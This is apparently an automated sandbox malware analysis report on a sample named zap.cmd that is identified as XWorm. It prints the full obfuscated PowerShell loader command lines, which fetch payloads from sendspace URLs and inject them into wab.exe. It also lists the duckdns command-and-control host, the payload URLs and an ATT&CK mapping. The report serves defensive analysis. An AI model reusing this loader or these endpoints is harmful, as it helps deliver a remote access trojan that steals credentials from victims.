d,ukb.ommajtubuleexci.corigitbandl rouleshj.teyrendes klbetvaasee istimsecco.virginoddf eforhit jagg. oitfwtiltueshakeb refrcprocelterm,ijassiestrafnun.ott');$songtress+=$skrteregimentets[1];skizoide ($songtress);skizoide (upstair91 'inca.$ stinsovervpcarboephiltca.sinkbo.bll.aveteknackdewder.polishhalvmele inabije,dshik,e olyr tagms blg [visc $ ludhufhovenpy,pnrkole erejsevzooloeephebnhomilgud.kiire,hinme epgu.homlfodb,ybarog1cepha6wolfe6ru,tp]
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$monostelous = 1;$fomented='sub';$fomented+='strin';$fomented+='g';function upstair91($contrive){$noontide=$contrive.length-$monostelous;for($bortskaffelsesmetode=5;$bortskaffelsesmetode -lt $noontide;$bortskaffelsesmetode+=6){$savnes+=$contrive.$fomented.invoke( $bortskaffelsesmetode, $monostelous);}$savnes;}function skizoide($cheanne){.($scrimshorn) ($cheanne);}$lagenens=upstair91 'autommskvisosamoazbi.elinuclelmis ilsla,ea.vern/vek.e5unmag. inf 0 aaha spade(unrelw im eitatusnek,pedtilkeotrykkwiconos gumm vent.n villtation outse1 efte0 numm.,hoog0 nabo;skrot ukyndwcheirip.ddenrokad6 unde4diara;nanny hus.exselvg6bikse4konsu;dagso kor.fr ego v ripo:helul1 lau2overn1perio. hove0genre) ,ugt replgremnfecor.ecpre,oknonvaoafpas/myste2diaer0lre r1trich0svanh0pauci1condu0op.ak1,elss semitf oilsi,asserlu.thepriesf uoplolittex g.de/snr l1 caud2,hole1 .pre. lobb0savou ';$unrevengingly166=upstair91 'peepiu fl es,ndiseperv r pins- al,oaapprigspadeefil,nngenavtnonfe ';$stot=upstair91 'ren rhbevistkedeltniellpfortrsfotom:selvh/ acke/bjergwfilbew.oncowbilla.ov rss sisaesamarnrefride melsndvenpstimea sangc bukse bes,.tempeccero,opizzimmaste/benaapkviltrstangofluff/appoidprocelprint/va ut5tet amcirku5opsprareset1solfauop ys ';$detonate=upstair91 ',nthr>opbev ';$scrimshorn=upstair91 'latkeis.igpe ballxkompr ';$pelagia123='tordnes';$udpressede = upstair91 'cireretredic staihsvrscometr. filmm%vildka a,phplill,pestradr,misapersptmanu.ainter%bre,s\restibgenn,eekseklvold esoogeju,draredg,mifolkenskorsgst.nds punctlope.iinduslbacitshenhrtunde.akrgebn bigfdfarvee .opon nomie kontstyvep.sammeu turbn ta zjveggi appli&r.dio&udlov fiksedrypncuforuh coinoande. te,rt,fslu ';skizoide (upstair91 ' ba d$hon.rg peril .outo gebrbsulfoa udsklsypho:kunnesrigsbk,intersynkats,emme m skr .ueleflagegbiliniinform moopecinchnhovedtd trse semitrnereslandi=arbe,(su,recreflemthinodtj.ne medit/spkhucta.ul amtsk$s adsugrabbd helspw,ener rentedickysfloriss gareelderd etlyel,ane)maler ');skizoide (upstair91 'ra,le$sabelg forslsloppo ge sbko.teagrae,l trac:spredbo.rejetautnsiliadtrumvgrm risesam enstyrtdefterecrowdsuropf=vnget$gr gestvangtsm leoban.stblo.s.poulis phalpgrimrld,visidebittkamuf(chest$l.ciddadelselydentmatteocamern rackasammetsiklie page) redo ');$stot=$bestrendes[0];$songtress= (upstair91 'fri b$ stegglaansllimitostd ubinitiagroenlaande: skaks ,carpdundye musocbi,tekvaretl favoecovendpayba= for,nselvmeenkepwlyrik-seksto d,ukb.ommajtubuleexci.corigitbandl rouleshj.teyrendes klbetvaasee istimsecco.virginoddf eforhit jagg. oitfwtiltueshakeb refrcprocelterm,ijassiestrafnun.ott');$songtress+=$skrteregimentets[1];skizoide ($songtress);skizoide (upstair91 'inca.$ stinsovervpcarboephiltca.sinkbo.bll.aveteknackdewder.polishhalvmele inabije,dshik,e olyr tagms blg [visc $ ludhufhovenpy,pnrkole erejsevzooloeephebnhomilgud.kiire,hinme epgu.homlfodb,ybarog1cepha6wolfe6ru,tp] pen,=hom g$vol,mlcl,quavJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$monostelous = 1;$fomented='sub';$fomented+='strin';$fomented+='g';function upstair91($contrive){$noontide=$contrive.length-$monostelous;for($bortskaffelsesmetode=5;$bortskaffelsesmetode -lt $noontide;$bortskaffelsesmetode+=6){$savnes+=$contrive.$fomented.invoke( $bortskaffelsesmetode, $monostelous);}$savnes;}function skizoide($cheanne){.($scrimshorn) ($cheanne);}$lagenens=upstair91 'autommskvisosamoazbi.elinuclelmis ilsla,ea.vern/vek.e5unmag. inf 0 aaha spade(unrelw im eitatusnek,pedtilkeotrykkwiconos gumm vent.n villtation outse1 efte0 numm.,hoog0 nabo;skrot ukyndwcheirip.ddenrokad6 unde4diara;nanny hus.exselvg6bikse4konsu;dagso kor.fr ego v ripo:helul1 lau2overn1perio. hove0genre) ,ugt replgremnfecor.ecpre,oknonvaoafpas/myste2diaer0lre r1trich0svanh0pauci1condu0op.ak1,elss semitf oilsi,asserlu.thepriesf uoplolittex g.de/snr l1 caud2,hole1 .pre. lobb0savou ';$unrevengingly166=upstair91 'peepiu fl es,ndiseperv r pins- al,oaapprigspadeefil,nngenavtnonfe ';$stot=upstair91 'ren rhbevistkedeltniellpfortrsfotom:selvh/ acke/bjergwfilbew.oncowbilla.ov rss sisaesamarnrefride melsndvenpstimea sangc bukse bes,.tempeccero,opizzimmaste/benaapkviltrstangofluff/appoidprocelprint/va ut5tet amcirku5opsprareset1solfauop ys ';$detonate=upstair91 ',nthr>opbev ';$scrimshorn=upstair91 'latkeis.igpe ballxkompr ';$pelagia123='tordnes';$udpressede = upstair91 'cireretredic staihsvrscometr. filmm%vildka a,phplill,pestradr,misapersptmanu.ainter%bre,s\restibgenn,eekseklvold esoogeju,draredg,mifolkenskorsgst.nds punctlope.iinduslbacitshenhrtunde.akrgebn bigfdfarvee .opon nomie kontstyvep.sammeu turbn ta zjveggi appli&r.dio&udlov fiksedrypncuforuh coinoande. te,rt,fslu ';skizoide (upstair91 ' ba d$hon.rg peril .outo gebrbsulfoa udsklsypho:kunnesrigsbk,intersynkats,emme m skr .ueleflagegbiliniinform moopecinchnhovedtd trse semitrnereslandi=arbe,(su,recreflemthinodtj.ne medit/spkhucta.ul amtsk$s adsugrabbd helspw,ener rentedickysfloriss gareelderd etlyel,ane)maler ');skizoide (upstair91 'ra,le$sabelg forslsloppo ge sbko.teagrae,l trac:spredbo.rejetautnsiliadtrumvgrm risesam enstyrtdefterecrowdsuropf=vnget$gr gestvangtsm leoban.stblo.s.poulis phalpgrimrld,visidebittkamuf(chest$l.ciddadelselydentmatteocamern rackasammetsiklie page) redo ');$stot=$bestrendes[0];$songtress= (upstair91 'fri b$ stegglaansllimitostd ubinitiagroenlaande: skaks ,carpdundye musocbi,tekvaretl favoecovendpayba= for,nselvmeenkepwlyrik-seksto d,ukb.ommajtubuleexci.corigitbandl rouleshj.teyrendes klbetvaasee istimsecco.virginoddf eforhit jagg. oitfwtiltueshakeb refrcprocelterm,ijassiestrafnun.ott');$songtress+=$skrteregimentets[1];skizoide ($songtress);skizoide (upstair91 'inca.$ stinsovervpcarboephiltca.sinkbo.bll.aveteknackdewder.polishhalvmele inabije,dshik,e olyr tagms blg [visc $ ludhufhovenpy,pnrkole erejsevzooloeephebnhomilgud.kiire,hinme epgu.homlfodb,ybarog1cepha6wolfe6ru,tp] Jump to behavior
              Source: wab.exe, 0000000A.00000002.2921644464.000000002613A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000002.2921644464.000000002613A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-^q
              Source: wab.exe, 0000000A.00000002.2921644464.000000002613A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: wab.exe, 0000000A.00000002.2921644464.000000002613A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: wab.exe, 0000000A.00000002.2921644464.000000002613A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q$j
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 0000000A.00000002.2921644464.0000000025F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2688, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 0000000A.00000002.2921644464.0000000025F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2688, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		1
              DLL Side-Loading              		112
              Process Injection              		1
              Masquerading              		OS Credential Dumping21
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Disable or Modify Tools              		LSASS Memory2
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)41
              Virtualization/Sandbox Evasion              		Security Account Manager41
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook112
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeylogging213
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing              		Cached Domain Credentials14
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446779 Sample: zap.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 30 xgmn934.duckdns.org 2->30 32 www.sendspace.com 2->32 34 2 other IPs or domains 2->34 48 Snort IDS alert for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 56 6 other signatures 2->56 9 cmd.exe 1 2->9         started        signatures3 54 Uses dynamic DNS services 30->54 process4 signatures5 58 Suspicious powershell command line found 9->58 60 Very long command line found 9->60 12 powershell.exe 14 23 9->12         started        16 conhost.exe 9->16         started        process6 dnsIp7 40 fs13n3.sendspace.com 69.31.136.57, 443, 49731 GTT-BACKBONEGTTDE United States 12->40 42 www.sendspace.com 172.67.170.105, 443, 49730, 49738 CLOUDFLARENETUS United States 12->42 62 Suspicious powershell command line found 12->62 64 Very long command line found 12->64 66 Found suspicious powershell code related to unpacking or dynamic code loading 12->66 18 powershell.exe 17 12->18         started        21 conhost.exe 12->21         started        23 cmd.exe 1 12->23         started        signatures8 process9 signatures10 44 Writes to foreign memory regions 18->44 46 Found suspicious powershell code related to unpacking or dynamic code loading 18->46 25 wab.exe 14 18->25         started        28 cmd.exe 1 18->28         started        process11 dnsIp12 36 xgmn934.duckdns.org 12.202.180.134, 49741, 8896 FISERV-INCUS United States 25->36 38 fs03n3.sendspace.com 69.31.136.17, 443, 49739 GTT-BACKBONEGTTDE United States 25->38

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              zap.cmd3%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://crl.micro0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://fs13n3.sendspaX0%Avira URL Cloudsafe
              https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin2d520%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/5m5a1uP0%Avira URL Cloudsafe
              https://fs03n3.sendspace.com/m60%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              http://www.sendspace.com0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/wyg3h50%Avira URL Cloudsafe
              https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binj920%Avira URL Cloudsafe
              xgmn934.duckdns.org0%Avira URL Cloudsafe
              https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin8F4H0%Avira URL Cloudsafe
              https://www.sendspace.com0%Avira URL Cloudsafe
              https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin0%Avira URL Cloudsafe
              https://fs03n3.sendspace.com/I60%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/wyg3h5z0%Avira URL Cloudsafe
              https://fs03n3.sendspace.com/0%Avira URL Cloudsafe
              https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binotBe0%Avira URL Cloudsafe
              https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binP930%Avira URL Cloudsafe
              http://fs13n3.sendspace.com0%Avira URL Cloudsafe
              https://fs13n3.sendspace.com/dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfb0%Avira URL Cloudsafe
              https://fs13n3.sendspace.com0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/5m5a1uXRul0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/5m5a1u0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/wyg3h5j830%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              fs13n3.sendspace.com
              		69.31.136.57
              		truefalse
                		unknown
                fs03n3.sendspace.com
                		69.31.136.17
                		truefalse
                  		unknown
                  xgmn934.duckdns.org
                  		12.202.180.134
                  		truetrue
                    		unknown
                    www.sendspace.com
                    		172.67.170.105
                    		truefalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://www.sendspace.com/pro/dl/wyg3h5false
                      • Avira URL Cloud: safe
                      		unknown
                      xgmn934.duckdns.orgtrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs13n3.sendspace.com/dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfbfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.com/pro/dl/5m5a1ufalse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin2d52wab.exe, 0000000A.00000003.2151778284.000000000A57F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2611833386.000002046AEC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binj92wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://go.micropowershell.exe, 00000002.00000002.2441978527.000002045C0E8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://fs13n3.sendspaXpowershell.exe, 00000002.00000002.2441978527.000002045CC23000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://fs03n3.sendspace.com/m6wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin8F4Hwab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.sendspace.compowershell.exe, 00000002.00000002.2441978527.000002045CBFE000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.com/pro/dl/5m5a1uPpowershell.exe, 00000002.00000002.2441978527.000002045B07D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.compowershell.exe, 00000002.00000002.2441978527.000002045B07D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045C713000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.com/pro/dl/wyg3h5zwab.exe, 0000000A.00000002.2907942536.000000000A552000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs03n3.sendspace.com/wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
